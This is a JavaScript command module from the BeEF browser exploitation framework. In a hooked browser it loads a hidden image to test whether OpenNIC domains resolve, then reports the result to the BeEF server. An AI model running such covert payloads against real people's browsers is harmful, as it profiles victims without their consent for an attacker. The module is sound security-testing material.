// // Copyright (c) 2006-2026Wade Alcorn - wade@bindshell.net // Browser Exploitation Framework (BeEF) - https://beefproject.com // See the file 'doc/COPYING' for copying permission // beef.execute(function() { if (document.getElementById('opennic_img_<%= @command_id %>')) { return "Img already created"; } var img = new Image(); img.setAttribute("style", "visibility:hidden"); img.setAttribute("width", "0"); img.setAttribute("height", "0"); img.src = '<%= @opennic_resource %>'; img.id = 'opennic_img_<%= @command_id %>'; img.setAttribute("attr", "start"); img.onerror = function() { this.setAttribute("attr", "error"); }; img.onload = function() { this.setAttribute("attr", "load"); }; document.body.appendChild(img); setTimeout(function() { var img = document.getElementById('opennic_img_<%= @command_id %>'); if (img.getAttribute("attr") == "error") { beef.debug('[Detect OpenNIC] Browser is not resolving OpenNIC domains.'); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is not resolving OpenNIC domains.'); } else if (img.getAttribute("attr") == "load") { beef.debug('[Detect OpenNIC] Browser is resolving OpenNIC domains.'); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Browser is resolving OpenNIC domains.'); } else if (img.getAttribute("attr") == "start") { beef.debug('[Detect OpenNIC] Timed out. Cannot determine if browser is resolving OpenNIC domains.'); beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Timed out. Cannot determine if browser is resolving OpenNIC domains.'); }; document.body.removeChild(img); }, <%= @timeout %>); });